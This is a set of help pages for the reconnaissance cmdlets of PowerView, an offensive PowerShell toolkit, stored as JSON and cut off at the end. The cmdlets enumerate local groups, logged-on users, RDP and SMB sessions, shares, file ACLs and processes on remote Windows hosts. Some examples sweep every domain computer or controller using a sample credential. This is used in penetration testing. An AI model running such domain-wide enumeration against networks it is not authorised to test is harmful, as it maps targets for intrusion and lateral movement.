    "content": "# Get-NetLocalGroup\r\n\r\n## SYNOPSIS\r\nEnumerates the local groups on the local (or remote) machine.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will enumerate the names and descriptions for the\r\nlocal groups on the current, or remote, machine.\r\nBy default, the Win32 API\r\ncall NetLocalGroupEnum will be used (for speed).\r\nSpecifying \"-Method WinNT\"\r\ncauses the WinNT service provider to be used instead, which returns group\r\nSIDs along with the group names and descriptions/comments.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetLocalGroup\r\n```\r\n\r\nComputerName                  GroupName                     Comment\r\n------------                  ---------                     -------\r\nWINDOWS1                      Administrators                Administrators have comple...\r\nWINDOWS1                      Backup Operators              Backup Operators can overr...\r\nWINDOWS1                      Cryptographic Operators       Members are authorized to ...\r\n...\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetLocalGroup -Method Winnt\r\n```\r\n\r\nComputerName           GroupName              GroupSID              Comment\r\n------------           ---------              --------              -------\r\nWINDOWS1               Administrators         S-1-5-32-544          Administrators hav...\r\nWINDOWS1               Backup Operators       S-1-5-32-551          Backup Operators c...\r\nWINDOWS1               Cryptographic Opera...\r\nS-1-5-32-569          Members are author...\r\n...\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-NetLocalGroup -ComputerName primary.testlab.local\r\n```\r\n\r\nComputerName                  GroupName                     Comment\r\n------------                  ---------                     -------\r\nprimary.testlab.local         Administrators                Administrators have comple...\r\nprimary.testlab.local         Users                         Users are prevented from m...\r\nprimary.testlab.local         Guests                        Guests have the same acces...\r\nprimary.testlab.local         Print Operators               Members can administer dom...\r\nprimary.testlab.local         Backup Operators              Backup Operators can overr...\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for sessions (also accepts IP addresses).\r\nDefaults to the localhost.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $Env:COMPUTERNAME\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Method\r\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: CollectionMethod\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: API\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to a remote machine.\r\nOnly applicable with \"-Method WinNT\".\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LocalGroup.API\r\n\r\nCustom PSObject with translated group property fields from API results.\r\n\r\nPowerView.LocalGroup.WinNT\r\n\r\nCustom PSObject with translated group property fields from WinNT results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetLocalGroupMember.md",
    "content": "# Get-NetLocalGroupMember\r\n\r\n## SYNOPSIS\r\nEnumerates members of a specific local group on the local (or remote) machine.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Convert-ADName\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will enumerate the members of a specified local group  on the\r\ncurrent, or remote, machine.\r\nBy default, the Win32 API call NetLocalGroupGetMembers\r\nwill be used (for speed).\r\nSpecifying \"-Method WinNT\" causes the WinNT service provider\r\nto be used instead, which returns a larger amount of information.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetLocalGroupMember | ft\r\n```\r\n\r\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\r\n------------   ---------      ----------     ---                   -------       --------\r\nWINDOWS1       Administrators WINDOWS1\\Ad...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators WINDOWS1\\lo...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators TESTLAB\\Dom...\r\nS-1-5-21-89... \r\nTrue           True\r\nWINDOWS1       Administrators TESTLAB\\har...\r\nS-1-5-21-89... \r\nFalse           True\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetLocalGroupMember -Method winnt | ft\r\n```\r\n\r\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\r\n------------   ---------      ----------     ---                   -------       --------\r\nWINDOWS1       Administrators WINDOWS1\\Ad...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators WINDOWS1\\lo...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators TESTLAB\\Dom...\r\nS-1-5-21-89... \r\nTrue           True\r\nWINDOWS1       Administrators TESTLAB\\har...\r\nS-1-5-21-89... \r\nFalse           True\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-NetLocalGroup | Get-NetLocalGroupMember | ft\r\n```\r\n\r\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\r\n------------   ---------      ----------     ---                   -------       --------\r\nWINDOWS1       Administrators WINDOWS1\\Ad...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators WINDOWS1\\lo...\r\nS-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       Administrators TESTLAB\\Dom...\r\nS-1-5-21-89... \r\nTrue           True\r\nWINDOWS1       Administrators TESTLAB\\har...\r\nS-1-5-21-89... \r\nFalse           True\r\nWINDOWS1       Guests         WINDOWS1\\Guest S-1-5-21-25... \r\nFalse          False\r\nWINDOWS1       IIS_IUSRS      NT AUTHORIT...\r\nS-1-5-17                False          False\r\nWINDOWS1       Users          NT AUTHORIT...\r\nS-1-5-4                 False          False\r\nWINDOWS1       Users          NT AUTHORIT...\r\nS-1-5-11                False          False\r\nWINDOWS1       Users          WINDOWS1\\lo...\r\nS-1-5-21-25... \r\nFalse        UNKNOWN\r\nWINDOWS1       Users          TESTLAB\\Dom...\r\nS-1-5-21-89... \r\nTrue        UNKNOWN\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-NetLocalGroupMember -ComputerName primary.testlab.local | ft\r\n```\r\n\r\nComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain\r\n------------   ---------      ----------     ---                   -------       --------\r\nprimary.tes...\r\nAdministrators TESTLAB\\Adm...\r\nS-1-5-21-89... \r\nFalse          False\r\nprimary.tes...\r\nAdministrators TESTLAB\\loc...\r\nS-1-5-21-89... \r\nFalse          False\r\nprimary.tes...\r\nAdministrators TESTLAB\\Ent...\r\nS-1-5-21-89... \r\nTrue          False\r\nprimary.tes...\r\nAdministrators TESTLAB\\Dom...\r\nS-1-5-21-89... \r\nTrue          False\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for sessions (also accepts IP addresses).\r\nDefaults to the localhost.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $Env:COMPUTERNAME\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -GroupName\r\nThe local group name to query for users.\r\nIf not given, it defaults to \"Administrators\".\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: True (ByPropertyName)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Method\r\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: CollectionMethod\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: API\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to a remote machine.\r\nOnly applicable with \"-Method WinNT\".\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LocalGroupMember.API\r\n\r\nCustom PSObject with translated group property fields from API results.\r\n\r\nPowerView.LocalGroupMember.WinNT\r\n\r\nCustom PSObject with translated group property fields from WinNT results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together\r\nhttp://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx\r\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together\r\nhttp://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx\r\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetLoggedon.md",
    "content": "# Get-NetLoggedon\r\n\r\n## SYNOPSIS\r\nReturns users logged on the local (or a remote) machine.\r\nNote: administrative rights needed for newer Windows OSes.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will execute the NetWkstaUserEnum Win32API call to query\r\na given host for actively logged on users.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetLoggedon\r\n```\r\n\r\nReturns users actively logged onto the local host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetLoggedon -ComputerName sqlserver\r\n```\r\n\r\nReturns users actively logged onto the 'sqlserver' host.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer | Get-NetLoggedon\r\n```\r\n\r\nReturns all logged on users for all computers in the domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-NetLoggedon -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for logged on users (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LoggedOnUserInfo\r\n\r\nA PSCustomObject representing a WKSTA_USER_INFO_1 structure, including\r\nthe UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetRDPSession.md",
    "content": "# Get-NetRDPSession\r\n\r\n## SYNOPSIS\r\nReturns remote desktop/session information for the local (or a remote) machine.\r\n\r\nNote: only members of the Administrators or Account Operators local group\r\ncan successfully execute this functionality on a remote target.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation\r\nWin32API calls to query a given RDP remote service for active sessions and originating\r\nIPs.\r\nThis is a replacement for qwinsta.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetRDPSession\r\n```\r\n\r\nReturns active RDP/terminal sessions on the local host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetRDPSession -ComputerName \"sqlserver\"\r\n```\r\n\r\nReturns active RDP/terminal sessions on the 'sqlserver' host.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainController | Get-NetRDPSession\r\n```\r\n\r\nReturns active RDP/terminal sessions on all domain controllers.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-NetRDPSession -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for active sessions (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.RDPSessionInfo\r\n\r\nA PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,\r\nwith the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetSession.md",
    "content": "# Get-NetSession\r\n\r\n## SYNOPSIS\r\nReturns session information for the local (or a remote) machine.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will execute the NetSessionEnum Win32API call to query\r\na given host for active sessions.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetSession\r\n```\r\n\r\nReturns active sessions on the local host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetSession -ComputerName sqlserver\r\n```\r\n\r\nReturns active sessions on the 'sqlserver' host.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainController | Get-NetSession\r\n```\r\n\r\nReturns active sessions on all domain controllers.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-NetSession -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for sessions (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.SessionInfo\r\n\r\nA PSCustomObject representing a WKSTA_USER_INFO_1 structure, including\r\nthe CName/UserName/Time/IdleTime for each session, with the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-NetShare.md",
    "content": "# Get-NetShare\r\n\r\n## SYNOPSIS\r\nReturns open shares on the local (or a remote) machine.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-NetShare [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will execute the NetShareEnum Win32API call to query\r\na given host for open shares.\r\nThis is a replacement for \"net share \\\\\\\\hostname\".\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-NetShare\r\n```\r\n\r\nReturns active shares on the local host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-NetShare -ComputerName sqlserver\r\n```\r\n\r\nReturns active shares on the 'sqlserver' host\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer | Get-NetShare\r\n```\r\n\r\nReturns all shares for all computers in the domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-NetShare -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for shares (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system using Invoke-UserImpersonation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ShareInfo\r\n\r\nA PSCustomObject representing a SHARE_INFO_1 structure, including\r\nthe name/type/remark for each share, with the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-PathAcl.md",
    "content": "# Get-PathAcl\r\n\r\n## SYNOPSIS\r\nEnumerates the ACL for a given file path.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-PathAcl [-Path] <String[]> [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates the ACL for a specified file/folder path, and translates\r\nthe access rules for each entry into readable formats.\r\nIf -Credential is passed,\r\nAdd-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-PathAcl \"\\\\SERVER\\Share\\\"\r\n```\r\n\r\nReturns ACLs for the given UNC share.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\ngci .\\test.txt | Get-PathAcl\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\r\nGet-PathAcl -Path \"\\\\\\\\SERVER\\Share\\\" -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\nSpecifies the local or remote path to enumerate the ACLs for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: FullName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target path.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nOne of more paths to enumerate ACLs for.\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.FileACL\r\n\r\nA custom object with the full path and associated ACL entries.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-RegLoggedOn.md",
    "content": "# Get-RegLoggedOn\r\n\r\n## SYNOPSIS\r\nReturns who is logged onto the local (or a remote) machine\r\nthrough enumeration of remote registry keys.\r\n\r\nNote: This function requires only domain user rights on the\r\nmachine you're enumerating, but remote registry must be enabled.\r\n\r\nAuthor: Matt Kelly (@BreakersAll)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-RegLoggedOn [[-ComputerName] <String[]>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will query the HKU registry values to retrieve the local\r\nlogged on users SID and then attempt and reverse it.\r\nAdapted technique from Sysinternal's PSLoggedOn script.\r\nBenefit over\r\nusing the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges\r\nrequired (NetWkstaUserEnum requires remote admin access).\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-RegLoggedOn\r\n```\r\n\r\nReturns users actively logged onto the local host.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-RegLoggedOn -ComputerName sqlserver\r\n```\r\n\r\nReturns users actively logged onto the 'sqlserver' host.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainController | Get-RegLoggedOn\r\n```\r\n\r\nReturns users actively logged on all domain controllers.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-RegLoggedOn -ComputerName sqlserver -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for remote registry values (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.RegLoggedOnUser\r\n\r\nA PSCustomObject including the UserDomain/UserName/UserSID of each\r\nactively logged on user, with the ComputerName added.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-WMIProcess.md",
    "content": "# Get-WMIProcess\r\n\r\n## SYNOPSIS\r\nReturns a list of processes and their owners on the local or remote machine.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-WMIProcess [[-ComputerName] <String[]>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nUses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,\r\nincluding the owners of the particular process.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-WMIProcess -ComputerName WINDOWS1\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the hostname to query for cached RDP connections (also accepts IP addresses).\r\nDefaults to 'localhost'.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.UserProcess\r\n\r\nA PSCustomObject containing the remote process information.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-WMIRegCachedRDPConnection.md",
